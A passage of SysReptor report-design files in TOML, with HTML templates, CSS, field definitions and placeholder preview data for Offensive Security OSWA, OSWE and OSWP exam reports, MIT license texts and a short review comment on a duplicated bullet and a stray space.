<h3 class="in-toc numbered">{{ vulnerability.reference}}</h3>
<markdown :text="vulnerability.details" />
</div>
<div v-if="finding.poc">
<h3 class="in-toc numbered" >PoC Code</h3>
<markdown :text="finding.poc" />
</div>
<div v-if="finding.screenshots">
<h3 class="in-toc numbered">Screenshots</h3>
<markdown :text="finding.screenshots" />
</div>
<div v-if="finding.steps">
<h3 class="in-toc numbered">Steps</h3>
<markdown :text="finding.steps" />
</div>
<pagebreak />
</div>
</section>
<section v-if="report.appendix_sections.length > 0" class="appendix">
<h1 id="appendix" class="in-toc numbered">Appendix</h1>
<div v-for="appendix_section in report.appendix_sections">
<h2 class="in-toc numbered">{{ appendix_section.title }}</h2>
<markdown :text="appendix_section.content" />
</div>
<pagebreak />
</section>
<section>
<div class="end-of-report">
End of Report<br>
</div>
<div class="end-of-report">
This report was rendered<br>
by <a href="https://docs.sysreptor.com/">SysReptor</a> with<br>
<span style="color:red;">&hearts;</span><br>
</div>
</section>
"""
report_styles = """
@import "/assets/global/base.css";
/* Define variables */
:root {
--color-risk-critical: #E83221;
--color-risk-high: #FF9300;
--color-risk-medium: #FFDA00;
--color-risk-low: #4285F5;
--color-risk-info: #00AE51;
--color-cover-page-bg: #ce0075;
}
/* Font settings */
html {
font-family: "Noto Sans", sans-serif;
font-size: 10pt;
}
/* Global styles */
@page {
size: A4 portrait;
margin: 35mm 20mm 25mm 20mm;
}
a {
font-style: italic;
text-decoration: none;
color: inherit;
}
pre code {
border: 1px solid black;
padding: 0.2em !important;
}
code {
background-color: rgb(221, 221, 221);
}
th {
background-color: #ABABAB;
font-weight: bold;
}
tr.table-row-link td {
padding: 0;
}
tr.table-row-link td a {
display: block;
padding: 0.3em;
color: inherit;
text-decoration: none;
font-style: inherit;
}
.table-key {
background-color: #ABABAB;
}
/* Classes for risk colors */
.risk-critical { color: var(--color-risk-critical) !important; font-weight: bold; }
.risk-high { color: var(--color-risk-high) !important; font-weight: bold; }
.risk-medium { color: var(--color-risk-medium) !important; font-weight: bold; }
.risk-low { color: var(--color-risk-low) !important; font-weight: bold; }
.risk-info { color: var(--color-risk-info) !important; font-weight: bold; }
.risk-bg-critical { background-color: var(--color-risk-critical) !important; color: white !important; }
.risk-bg-high { background-color: var(--color-risk-high) !important; }
.risk-bg-medium { background-color: var(--color-risk-medium) !important; }
.risk-bg-low { background-color: var(--color-risk-low) !important; }
.risk-bg-info { background-color: var(--color-risk-info) !important; }
/* Helper class for referencing page number */
.ref-page::before {
content: "" !important;
}
.ref-page::after {
content: target-counter(attr(href), page) !important;
}
.ref-page .ref-title {
display: none !important;
}
/* Table in finding chapters */
.finding-heading .table-key {
height: 3em;
width: 10em;
}
.end-of-report {
text-align:center;
font-style:italic;
margin-top:70px;
line-height:1.7;
}
/* #region footer */
@page {
@bottom-left { content: element(footer-left); }
@bottom-center { content: element(footer-center); }
@bottom-right-corner { content: counter(page); }
}
#footer #footer-left { position: running(footer-left); }
#footer #footer-center { position: running(footer-center); }
/* #endregion footer */
/* #region watermark */
#watermark-osid {
position: fixed;
top: 9cm;
left: 1cm;
transform: rotate(-45deg);
font-size: 90pt;
text-transform: uppercase;
opacity: 0.2;
}
/* #endregion watermark */
/* #region page-cover */
@page :first {
/* Footer on the cover page */
@bottom-right-corner {
content: "";
}
@bottom-right {
/* Page number */
content: counter(page);
font-size: 9pt;
color: white
}
@bottom-left {
content: "Confidential";
text-transform: uppercase;
font-style: italic;
color: white;
}
/* Pentest title should not appear on cover page */
@bottom-center {
content: '';
}
}
#page-cover-background{
position: absolute;
margin-top: -35mm;
margin-left: -20mm;
width: 210mm;
height: 297mm;
background-color: var(--color-cover-page-bg);
}
/* Title page elements */
#page-cover-title {
position: absolute;
top: 20mm;
left: 0;
width: 14cm;
color: #ffffff;
}
#page-cover-title h1 {
font-size: 32pt;
}
#page-cover-title h2 {
font-size: 24pt;
}
#page-cover-student {
position: absolute;
top: 11cm;
left: 0;
width: 14cm;
color: #ffffff;
}
#page-cover-osid {
font-size: 14pt;
}
#page-cover-meta {
line-height: 2em;
}
/* #endregion page-cover */
/* #region toc */
#toc li {
list-style: none;
margin: 0;
padding: 0;
}
#toc .ref::before {
padding-right: 0.5em;
}
#toc .ref::after {
content: " " leader(".") " " target-counter(attr(href), page);
}
#toc .toc-level1 {
font-size: 1.5rem;
font-weight: bold;
margin-top: 0.8rem;
}
#toc .toc-level2 {
font-size: 1.2rem;
font-weight: bold;
margin-top: 0.5rem;
margin-left: 2rem;
}
#toc .toc-level3 {
font-size: 1rem;
margin-top: 0.4rem;
margin-left: 4rem;
}
#toc .toc-level4 {
font-size: 1rem;
margin-top: 0;
margin-left: 6rem;
}
/* #endregion toc */
"""
[report_fields]
[report_fields.title]
type = "string"
label = "Title"
origin = "core"
default = "OSWA Exam Documentation"
required = true
spellcheck = true
[report_fields.mail]
type = "string"
label = "Mail"
origin = "custom"
default = "student@example.com"
required = true
spellcheck = false
[report_fields.osid]
type = "string"
label = "OSID"
origin = "custom"
default = "XXXXX"
required = true
spellcheck = false
[report_fields.lastname]
type = "string"
label = "Lastname"
origin = "custom"
default = "Doe"
required = true
spellcheck = false
[report_fields.firstname]
type = "string"
label = "Firstname"
origin = "custom"
default = "John"
required = true
spellcheck = false
[report_fields.watermark]
type = "boolean"
label = "Watermark"
origin = "custom"
default = false
[report_fields.report_date]
type = "date"
label = "Report Date"
origin = "custom"
required = true
[report_fields.report_version]
type = "string"
label = "Report Version"
origin = "custom"
default = "1.0"
required = true
spellcheck = false
[report_fields.appendix_sections]
type = "list"
label = "Appendix"
origin = "custom"
required = true
[report_fields.appendix_sections.items]
type = "object"
label = ""
origin = "custom"
[report_fields.appendix_sections.items.properties]
[report_fields.appendix_sections.items.properties.title]
type = "string"
label = "Title"
origin = "custom"
default = "TODO appendix title"
required = true
spellcheck = false
[report_fields.appendix_sections.items.properties.content]
type = "markdown"
label = "Content"
origin = "custom"
default = "TODO This section is placed for any additional items that were not mentioned in the overall report."
required = true
[[report_sections]]
id = "Student"
label = "Student"
fields = [
"firstname",
"lastname",
"osid",
"mail",
]
[[report_sections]]
id = "other"
label = "Document Control"
fields = [
"title",
"report_date",
"report_version",
"watermark",
]
[[report_sections]]
id = "appendix"
label = "Appendix"
fields = [
"appendix_sections",
]
[finding_fields]
[finding_fields.title]
type = "string"
label = "Target"
origin = "core"
default = "TODO Target Name"
required = true
spellcheck = true
[finding_fields.cvss]
type = "cvss"
label = "CVSS (not required)"
origin = "core"
default = "n/a"
required = false
[finding_fields.poc]
type = "markdown"
label = "PoC Code"
origin = "custom"
default = "TODO Provide the final proof of concept code used to gain access to the server."
required = true
[finding_fields.proof]
type = "markdown"
label = "Proof.txt"
origin = "custom"
default = "TODO Provide the contents of local.txt and proof.txt"
required = true
[finding_fields.steps]
type = "markdown"
label = "Steps"
origin = "custom"
default = "TODO Provide a detailed account of your methodology in creating the exploits. The steps taken should be able to be easily followed and reproducible if necessary."
required = true
[finding_fields.screenshots]
type = "markdown"
label = "Screenshots"
origin = "custom"
default = "TODO Provide screenshots of local.txt and proof.txt contents as stated in the Exam Control Panel Objectives."
required = true
[finding_fields.vulnerabilities]
type = "list"
label = "Vulnerabilities"
origin = "custom"
required = true
[finding_fields.vulnerabilities.items]
type = "object"
label = ""
origin = "custom"
[finding_fields.vulnerabilities.items.properties]
[finding_fields.vulnerabilities.items.properties.details]
type = "markdown"
label = "Details"
origin = "custom"
default = "TODO Provide the method and steps used to find the vulnerability."
required = true
[finding_fields.vulnerabilities.items.properties.reference]
type = "string"
label = "Reference"
origin = "custom"
default = "Vulnerability X"
required = true
spellcheck = false
[report_preview_data]
[report_preview_data.report]
title = "OSWA Exam Documentation"
mail = "student@example.com"
osid = "OS-XXXXX"
watermark = true
report_date = "2022-07-29"
report_version = "1.0"
firstname = "John"
lastname = "Doe"
[[report_preview_data.report.appendix_sections]]
title = "Appendix Title"
content = "TODO This section is placed for any additional items that were not mentioned in the overall report."
[[report_preview_data.findings]]
title = "192.168.X.X"
cvss = ""
id = "25a70e70-515e-4664-b7ab-dffc2f2fe12e"
proof = "TODO Provide the contents of local.txt and proof.txt"
poc = "TODO Provide the method and steps used to find the vulnerability."
screenshots = "TODO Provide screenshots of local.txt and proof.txt contents as stated in the Exam Control Panel Objectives."
steps = "TODO Provide a detailed account of your methodology in creating the exploits. The steps taken should be able to be easily followed and reproducible if necessary."
[[report_preview_data.findings.vulnerabilities]]
reference = "Vulnerability X"
details = "TODO Provide the method and steps used to find the vulnerability."
[[report_preview_data.findings.vulnerabilities]]
reference = "Vulnerability X"
details = "TODO Provide the method and steps used to find the vulnerability."
[[report_preview_data.findings.vulnerabilities]]
reference = "Vulnerability X"
details = "TODO Provide the method and steps used to find the vulnerability."
[[assets]]
id = "61da17b8-8645-4a6b-b23c-fa907945a607"
name = "LICENSE"


@ -0,0 +1,21 @@
MIT License
Copyright (c) 2023 SysReptor Developers
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.


@ -0,0 +1,563 @@
format = "projecttypes/v1"
id = "80ac1530-f930-41e4-ae3a-ba280fb31505"
name = "OSWE Exam Report v1.1"
language = "en-US"
finding_field_order = [
"title",
"proof",
"vulnerabilities",
"poc",
"screenshots",
"steps",
"cvss",
]
report_template = """
<div id="footer" data-sysreptor-generated="page-footer">
<div id="footer-left"><em>CONFIDENTIAL</em></div>
<div id="footer-center">{{ report.title }}</div>
</div>
<div v-if="report.watermark" id="watermark-osid">{{ report.osid }}</div>
<section id="page-cover" data-sysreptor-generated="page-cover">
<div id="page-cover-background" />
<div id="page-cover-title">
<h1>Offensive Security</h1>
<h2>{{ report.title }}</h2>
</div>
<div id="page-cover-student">
<p id="page-cover-osid">
<strong>OSID: {{ report.osid }}</strong><br>
{{ report.mail }}<br>
</p>
<p id="page-cover-meta">
{{ formatDate(report.report_date, 'long') }}<br>
v{{ report.report_version }}
</p>
</div>
</section>
<pagebreak />
<table-of-contents id="toc" v-slot="tocItems">
<h1>Table of Contents</h1>
<ul>
<li v-for="item in tocItems" :class="'toc-level' + item.level">
<ref :to="item.id" />
</li>
</ul>
<pagebreak />
</table-of-contents>
<markdown>
# Offensive Security OSWE Exam Documentation {.in-toc.numbered}
The Offensive Security OSWE exam documentation contains all efforts that were conducted in order to pass the Offensive Security Web Expert exam. This report will be graded from a standpoint of correctness and fullness to all aspects of the exam. The purpose of this report is to ensure that the student has the technical knowledge required to pass the qualifications for the Offensive Security Web Expert certification.
The student will be required to fill out this exam documentation fully and to include the following sections:
* Methodology walkthrough and detailed outline of steps taken
* Each finding with included screenshots, walkthrough, sample code, and proof.txt if applicable.
* Each finding with included screenshots, walkthrough, sample code, and proof.txt if ap-plicable.
* Any additional items that were not included
</markdown>
<pagebreak/>
<section>
<h1 id="findings" class="in-toc numbered">Findings</h1>
<div v-for="(finding, index) in findings">
<h2 :id="finding.id" class="in-toc numbered">{{ finding.title }}</h2>
<div v-if="finding.proof">
<h3 class="in-toc numbered">Local.txt/Proof.txt</h3>
<markdown :text="finding.proof" />
</div>
<div v-for="vulnerability in finding.vulnerabilities">
<h3 class="in-toc numbered">{{ vulnerability.reference}}</h3>
<markdown :text="vulnerability.details" />
</div>
<div v-if="finding.poc">
<h3 class="in-toc numbered" >PoC Code</h3>
<markdown :text="finding.poc" />
</div>
<div v-if="finding.screenshots">
<h3 class="in-toc numbered">Screenshots</h3>
<markdown :text="finding.screenshots" />
</div>
<div v-if="finding.steps">
<h3 class="in-toc numbered">Steps</h3>
<markdown :text="finding.steps" />
</div>
<pagebreak />
</div>
</section>
<section v-if="report.appendix_sections.length > 0" class="appendix">
<h1 id="appendix" class="in-toc numbered">Appendix</h1>
<div v-for="appendix_section in report.appendix_sections">
<h2 class="in-toc numbered">{{ appendix_section.title }}</h2>
<markdown :text="appendix_section.content" />
</div>
<pagebreak />
</section>
<section>
<div class="end-of-report">
End of Report<br>
</div>
<div class="end-of-report">
This report was rendered<br>
by <a href="https://docs.sysreptor.com/">SysReptor</a> with<br>
<span style="color:red;">&hearts;</span><br>
</div>
</section>
"""
report_styles = """
@import "/assets/global/base.css";
/* Define variables */
:root {
--color-risk-critical: #E83221;
--color-risk-high: #FF9300;
--color-risk-medium: #FFDA00;
--color-risk-low: #4285F5;
--color-risk-info: #00AE51;
--color-cover-page-bg: #8fce00;
}
/* Font settings */
html {
font-family: "Noto Sans", sans-serif;
font-size: 10pt;
}
/* Global styles */
@page {
size: A4 portrait;
margin: 35mm 20mm 25mm 20mm;
}
a {
font-style: italic;
text-decoration: none;
color: inherit;
}
pre code {
border: 1px solid black;
padding: 0.2em !important;
}
code {
background-color: rgb(221, 221, 221);
}
th {
background-color: #ABABAB;
font-weight: bold;
}
tr.table-row-link td {
padding: 0;
}
tr.table-row-link td a {
display: block;
padding: 0.3em;
color: inherit;
text-decoration: none;
font-style: inherit;
}
.table-key {
background-color: #ABABAB;
}
/* Classes for risk colors */
.risk-critical { color: var(--color-risk-critical) !important; font-weight: bold; }
.risk-high { color: var(--color-risk-high) !important; font-weight: bold; }
.risk-medium { color: var(--color-risk-medium) !important; font-weight: bold; }
.risk-low { color: var(--color-risk-low) !important; font-weight: bold; }
.risk-info { color: var(--color-risk-info) !important; font-weight: bold; }
.risk-bg-critical { background-color: var(--color-risk-critical) !important; color: white !important; }
.risk-bg-high { background-color: var(--color-risk-high) !important; }
.risk-bg-medium { background-color: var(--color-risk-medium) !important; }
.risk-bg-low { background-color: var(--color-risk-low) !important; }
.risk-bg-info { background-color: var(--color-risk-info) !important; }
/* Helper class for referencing page number */
.ref-page::before {
content: "" !important;
}
.ref-page::after {
content: target-counter(attr(href), page) !important;
}
.ref-page .ref-title {
display: none !important;
}
/* Table in finding chapters */
.finding-heading .table-key {
height: 3em;
width: 10em;
}
.end-of-report {
text-align:center;
font-style:italic;
margin-top:70px;
line-height:1.7;
}
/* #region footer */
@page {
@bottom-left { content: element(footer-left); }
@bottom-center { content: element(footer-center); }
@bottom-right-corner { content: counter(page); }
}
#footer #footer-left { position: running(footer-left); }
#footer #footer-center { position: running(footer-center); }
/* #endregion footer */
/* #region watermark */
#watermark-osid {
position: fixed;
top: 9cm;
left: 1cm;
transform: rotate(-45deg);
font-size: 90pt;
text-transform: uppercase;
opacity: 0.2;
}
/* #endregion watermark */
/* #region page-cover */
@page :first {
/* Footer on the cover page */
@bottom-right-corner {
content: "";
}
@bottom-right {
/* Page number */
content: counter(page);
font-size: 9pt;
color: white
}
@bottom-left {
content: "Confidential";
text-transform: uppercase;
font-style: italic;
color: white;
}
/* Pentest title should not appear on cover page */
@bottom-center {
content: '';
}
}
#page-cover-background{
position: absolute;
margin-top: -35mm;
margin-left: -20mm;
width: 210mm;
height: 297mm;
background-color: var(--color-cover-page-bg);
}
/* Title page elements */
#page-cover-title {
position: absolute;
top: 20mm;
left: 0;
width: 14cm;
color: #ffffff;
}
#page-cover-title h1 {
font-size: 32pt;
}
#page-cover-title h2 {
font-size: 24pt;
}
#page-cover-student {
position: absolute;
top: 11cm;
left: 0;
width: 14cm;
color: #ffffff;
}
#page-cover-osid {
font-size: 14pt;
}
#page-cover-meta {
line-height: 2em;
}
/* #endregion page-cover */
/* #region toc */
#toc li {
list-style: none;
margin: 0;
padding: 0;
}
#toc .ref::before {
padding-right: 0.5em;
}
#toc .ref::after {
content: " " leader(".") " " target-counter(attr(href), page);
}
#toc .toc-level1 {
font-size: 1.5rem;
font-weight: bold;
margin-top: 0.8rem;
}
#toc .toc-level2 {
font-size: 1.2rem;
font-weight: bold;
margin-top: 0.5rem;
margin-left: 2rem;
}
#toc .toc-level3 {
font-size: 1rem;
margin-top: 0.4rem;
margin-left: 4rem;
}
#toc .toc-level4 {
font-size: 1rem;
margin-top: 0;
margin-left: 6rem;
}
/* #endregion toc */
"""
[report_fields]
[report_fields.title]
type = "string"
label = "Title"
origin = "core"
default = "OSWE Exam Documentation"
required = true
spellcheck = true
[report_fields.mail]
type = "string"
label = "Mail"
origin = "custom"
default = "student@example.com"
required = true
spellcheck = false
[report_fields.osid]
type = "string"
label = "OSID"
origin = "custom"
default = "XXXXX"
required = true
spellcheck = false
[report_fields.lastname]
type = "string"
label = "Lastname"
origin = "custom"
default = "Doe"
required = true
spellcheck = false
[report_fields.firstname]
type = "string"
label = "Firstname"
origin = "custom"
default = "John"
required = true
spellcheck = false
[report_fields.watermark]
type = "boolean"
label = "Watermark"
origin = "custom"
default = false
[report_fields.report_date]
type = "date"
label = "Report Date"
origin = "custom"
required = true
[report_fields.report_version]
type = "string"
label = "Report Version"
origin = "custom"
default = "1.0"
required = true
spellcheck = false
[report_fields.appendix_sections]
type = "list"
label = "Appendix"
origin = "custom"
required = true
[report_fields.appendix_sections.items]
type = "object"
label = ""
origin = "custom"
[report_fields.appendix_sections.items.properties]
[report_fields.appendix_sections.items.properties.title]
type = "string"
label = "Title"
origin = "custom"
default = "TODO appendix title"
required = true
spellcheck = false
[report_fields.appendix_sections.items.properties.content]
type = "markdown"
label = "Content"
origin = "custom"
default = "TODO This section is placed for any additional items that were not mentioned in the overall report."
required = true
[[report_sections]]
id = "Student"
label = "Student"
fields = [
"firstname",
"lastname",
"osid",
"mail",
]
[[report_sections]]
id = "other"
label = "Document Control"
fields = [
"title",
"report_date",
"report_version",
"watermark",
]
[[report_sections]]
id = "appendix"
label = "Appendix"
fields = [
"appendix_sections",
]
[finding_fields]
[finding_fields.title]
type = "string"
label = "Target"
origin = "core"
default = "TODO Target Name"
required = true
spellcheck = true
[finding_fields.cvss]
type = "cvss"
label = "CVSS (not required)"
origin = "core"
default = "n/a"
required = false
[finding_fields.poc]
type = "markdown"
label = "PoC Code"
origin = "custom"
default = "TODO Provide the final proof of concept code used to gain access to the server."
required = true
[finding_fields.proof]
type = "markdown"
label = "Proof.txt"
origin = "custom"
default = "TODO Provide the contents of local.txt and proof.txt"
required = true
[finding_fields.steps]
type = "markdown"
label = "Steps"
origin = "custom"
default = "TODO Provide a detailed account of your methodology in creating the exploits. The steps taken should be able to be easily followed and reproducible if necessary."
required = true
[finding_fields.screenshots]
type = "markdown"
label = "Screenshots"
origin = "custom"
default = "TODO Provide screenshots of local.txt and proof.txt contents as stated in the Exam Control Panel Objectives."
required = true
[finding_fields.vulnerabilities]
type = "list"
label = "Vulnerabilities"
origin = "custom"
required = true
[finding_fields.vulnerabilities.items]
type = "object"
label = ""
origin = "custom"
[finding_fields.vulnerabilities.items.properties]
[finding_fields.vulnerabilities.items.properties.details]
type = "markdown"
label = "Details"
origin = "custom"
default = "TODO Provide the method and code used to find the vulnerability ."
required = true
[finding_fields.vulnerabilities.items.properties.reference]
type = "string"
label = "Reference"
origin = "custom"
default = "Vulnerability X"
required = true
spellcheck = false
[report_preview_data]
[report_preview_data.report]
title = "OSWE Exam Documentation"
mail = "student@example.com"
osid = "OS-XXXXX"
watermark = true
report_date = "2022-07-29"
report_version = "1.0"
firstname = "John"
lastname = "Doe"
[[report_preview_data.report.appendix_sections]]
title = "Appendix Title"
content = "TODO This section is placed for any additional items that were not mentioned in the overall report."
[[report_preview_data.findings]]
title = "192.168.X.X"
cvss = ""
id = "25a70e70-515e-4664-b7ab-dffc2f2fe12e"
proof = "TODO Provide the contents of local.txt and proof.txt"
poc = "TODO Provide the final proof of concept code used to gain access to the server."
screenshots = "TODO Provide screenshots of local.txt and proof.txt contents as stated in the Exam Control Panel Objectives."
steps = "TODO Provide a detailed account of your methodology in creating the exploits. The steps taken should be able to be easily followed and reproducible if necessary."
[[report_preview_data.findings.vulnerabilities]]
details = "TODO Provide the method and code used to find the vulnerability ."
reference = "Vulnerability X"
[[report_preview_data.findings.vulnerabilities]]
details = "TODO Provide the method and code used to find the vulnerability ."
reference = "Vulnerability X"
[[report_preview_data.findings.vulnerabilities]]
details = "TODO Provide the method and code used to find the vulnerability ."
reference = "Vulnerability X"
[[assets]]
id = "b7985a2b-aab2-41a1-a3f7-f035272a4c58"
name = "LICENSE"
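Review bot: The requirements list inside `report_template` carries the same bullet twice, and the second copy has a hyphenation artifact (`ap-plicable`), so every report rendered from this design would print both lines. Drop the second copy and keep `* Each finding with included screenshots, walkthrough, sample code, and proof.txt if applicable.`. The default of `finding_fields.vulnerabilities.items.properties.details` and the three matching `report_preview_data.findings.vulnerabilities` entries also end in `vulnerability .` with a stray space before the period; `"TODO Provide the method and code used to find the vulnerability."` reads cleanly.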


@ -0,0 +1,21 @@
MIT License
Copyright (c) 2023 SysReptor Developers
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.


@ -0,0 +1,514 @@
format = "projecttypes/v1"
id = "c465ed9d-546f-44ba-b519-eb3c036fda01"
name = "OSWP Exam Report v1.1"
language = "en-US"
finding_field_order = [
"title",
"description",
"proof",
"screenshots",
"steps",
"cvss",
]
report_template = """
<div id="footer" data-sysreptor-generated="page-footer">
<div id="footer-left"><em>CONFIDENTIAL</em></div>
<div id="footer-center">{{ report.title }}</div>
</div>
<div v-if="report.watermark" id="watermark-osid">{{ report.osid }}</div>
<section id="page-cover" data-sysreptor-generated="page-cover">
<div id="page-cover-background" />
<div id="page-cover-title">
<h1>Offensive Security</h1>
<h2>{{ report.title }}</h2>
</div>
<div id="page-cover-student">
<p id="page-cover-osid">
<strong>OSID: {{ report.osid }}</strong><br>
{{ report.mail }}<br>
</p>
<p id="page-cover-meta">
{{ formatDate(report.report_date, 'long') }}<br>
v{{ report.report_version }}
</p>
</div>
</section>
<pagebreak />
<table-of-contents id="toc" v-slot="tocItems">
<h1>Table of Contents</h1>
<ul>
<li v-for="item in tocItems" :class="'toc-level' + item.level">
<ref :to="item.id" />
</li>
</ul>
<pagebreak />
</table-of-contents>
<markdown>
# Offensive Security OSWP Exam Documentation {.in-toc.numbered}
The Offensive Security OSWP exam documentation contains all efforts that were conducted in order to pass the Offensive Security Wireless Professional exam. This report will be graded from a standpoint of correctness and fullness to all aspects of the exam. The purpose of this report is to ensure that the student has the technical knowledge required to pass the qualifications for the Offensive Security Wireless Professional certification.
## Requirements {.in-toc.numbered}
The student will be required to fill out this penetration testing report fully and to include the following sections:
* Methodology walkthrough and detailed outline of steps taken
* Each finding with included screenshots, walkthrough and sample commands
* Any additional items that were not included
</markdown>
<pagebreak/>
<section>
<h1 id="findings" class="in-toc numbered">Findings</h1>
<div v-for="finding in findings">
<markdown :text="finding.description" />
<h2 :id="finding.id" class="in-toc numbered">{{ finding.title }}</h2>
<div v-if="finding.proof">
<h3 class="in-toc numbered">Proof</h3>
<markdown :text="finding.proof" />
</div>
<div v-if="finding.screenshots">
<h3 class="in-toc numbered">Screenshots</h3>
<markdown :text="finding.screenshots" />
</div>
<div v-if="finding.steps">
<h3 class="in-toc numbered">Steps</h3>
<markdown :text="finding.steps" />
</div>
<pagebreak />
</div>
</section>
<section v-if="report.appendix_sections.length > 0" class="appendix">
<h1 id="appendix" class="in-toc numbered">Appendix</h1>
<div v-for="appendix_section in report.appendix_sections">
<h2 class="in-toc numbered">{{ appendix_section.title }}</h2>
<markdown :text="appendix_section.content" />
</div>
<pagebreak />
</section>
<section>
<div class="end-of-report">
End of Report<br>
</div>
<div class="end-of-report">
This report was rendered<br>
by <a href="https://docs.sysreptor.com/">SysReptor</a> with<br>
<span style="color:red;">&hearts;</span><br>
</div>
</section>
"""
report_styles = """
@import "/assets/global/base.css";
/* Define variables */
:root {
--color-risk-critical: #E83221;
--color-risk-high: #FF9300;
--color-risk-medium: #FFDA00;
--color-risk-low: #4285F5;
--color-risk-info: #00AE51;
--color-cover-page-bg: #c37cc3;
}
/* Font settings */
html {
font-family: "Noto Sans", sans-serif;
font-size: 10pt;
}
/* Global styles */
@page {
size: A4 portrait;
margin: 35mm 20mm 25mm 20mm;
}
a {
font-style: italic;
text-decoration: none;
color: inherit;
}
pre code {
border: 1px solid black;
padding: 0.2em !important;
}
code {
background-color: rgb(221, 221, 221);
}
th {
background-color: #ABABAB;
font-weight: bold;
}
tr.table-row-link td {
padding: 0;
}
tr.table-row-link td a {
display: block;
padding: 0.3em;
color: inherit;
text-decoration: none;
font-style: inherit;
}
.table-key {
background-color: #ABABAB;
}
/* Classes for risk colors */
.risk-critical { color: var(--color-risk-critical) !important; font-weight: bold; }
.risk-high { color: var(--color-risk-high) !important; font-weight: bold; }
.risk-medium { color: var(--color-risk-medium) !important; font-weight: bold; }
.risk-low { color: var(--color-risk-low) !important; font-weight: bold; }
.risk-info { color: var(--color-risk-info) !important; font-weight: bold; }
.risk-bg-critical { background-color: var(--color-risk-critical) !important; color: white !important; }
.risk-bg-high { background-color: var(--color-risk-high) !important; }
.risk-bg-medium { background-color: var(--color-risk-medium) !important; }
.risk-bg-low { background-color: var(--color-risk-low) !important; }
.risk-bg-info { background-color: var(--color-risk-info) !important; }
/* Helper class for referencing page number */
.ref-page::before {
content: "" !important;
}
.ref-page::after {
content: target-counter(attr(href), page) !important;
}
.ref-page .ref-title {
display: none !important;
}
/* Table in finding chapters */
.finding-heading .table-key {
height: 3em;
width: 10em;
}
.end-of-report {
text-align:center;
font-style:italic;
margin-top:70px;
line-height:1.7;
}
/* #region footer */
@page {
@bottom-left { content: element(footer-left); }
@bottom-center { content: element(footer-center); }
@bottom-right-corner { content: counter(page); }
}
#footer #footer-left { position: running(footer-left); }
#footer #footer-center { position: running(footer-center); }
/* #endregion footer */
/* #region watermark */
#watermark-osid {
position: fixed;
top: 9cm;
left: 1cm;
transform: rotate(-45deg);
font-size: 90pt;
text-transform: uppercase;
opacity: 0.2;
}
/* #endregion watermark */
/* #region page-cover */
@page :first {
/* Footer on the cover page */
@bottom-right-corner {
content: "";
}
@bottom-right {
/* Page number */
content: counter(page);
font-size: 9pt;
color: white
}
@bottom-left {
content: "Confidential";
text-transform: uppercase;
font-style: italic;
color: white;
}
/* Pentest title should not appear on cover page */
@bottom-center {
content: '';
}
}
#page-cover-background{
position: absolute;
margin-top: -35mm;
margin-left: -20mm;
width: 210mm;
height: 297mm;
background-color: var(--color-cover-page-bg);
}
/* Title page elements */
#page-cover-title {
position: absolute;
top: 20mm;
left: 0;
width: 14cm;
color: #ffffff;
}
#page-cover-title h1 {
font-size: 32pt;
}
#page-cover-title h2 {
font-size: 24pt;
}
#page-cover-student {
position: absolute;
top: 11cm;
left: 0;
width: 14cm;
color: #ffffff;
}
#page-cover-osid {
font-size: 14pt;
}
#page-cover-meta {
line-height: 2em;
}
/* #endregion page-cover */
/* #region toc */
#toc li {
list-style: none;
margin: 0;
padding: 0;
}
#toc .ref::before {
padding-right: 0.5em;
}
#toc .ref::after {
content: " " leader(".") " " target-counter(attr(href), page);
}
#toc .toc-level1 {
font-size: 1.5rem;
font-weight: bold;
margin-top: 0.8rem;
}
#toc .toc-level2 {
font-size: 1.2rem;
font-weight: bold;
margin-top: 0.5rem;
margin-left: 2rem;
}
#toc .toc-level3 {
font-size: 1rem;
margin-top: 0.4rem;
margin-left: 4rem;
}
#toc .toc-level4 {
font-size: 1rem;
margin-top: 0;
margin-left: 6rem;
}
/* #endregion toc */
"""
[report_fields]
[report_fields.title]
type = "string"
label = "Title"
origin = "core"
default = "OSWP Exam Documentation"
required = true
spellcheck = true
[report_fields.mail]
type = "string"
label = "Mail"
origin = "custom"
default = "student@example.com"
required = true
spellcheck = false
[report_fields.osid]
type = "string"
label = "OSID"
origin = "custom"
default = "XXXXX"
required = true
spellcheck = false
[report_fields.lastname]
type = "string"
label = "Lastname"
origin = "custom"
default = "Doe"
required = true
spellcheck = false
[report_fields.firstname]
type = "string"
label = "Firstname"
origin = "custom"
default = "John"
required = true
spellcheck = false
[report_fields.watermark]
type = "boolean"
label = "Watermark"
origin = "custom"
default = false
[report_fields.report_date]
type = "date"
label = "Report Date"
origin = "custom"
required = true
[report_fields.report_version]
type = "string"
label = "Report Version"
origin = "custom"
default = "1.0"
required = true
spellcheck = false
[report_fields.appendix_sections]
type = "list"
label = "Additional Items Not Mentioned in the Report"
origin = "custom"
required = true
[report_fields.appendix_sections.items]
type = "object"
label = ""
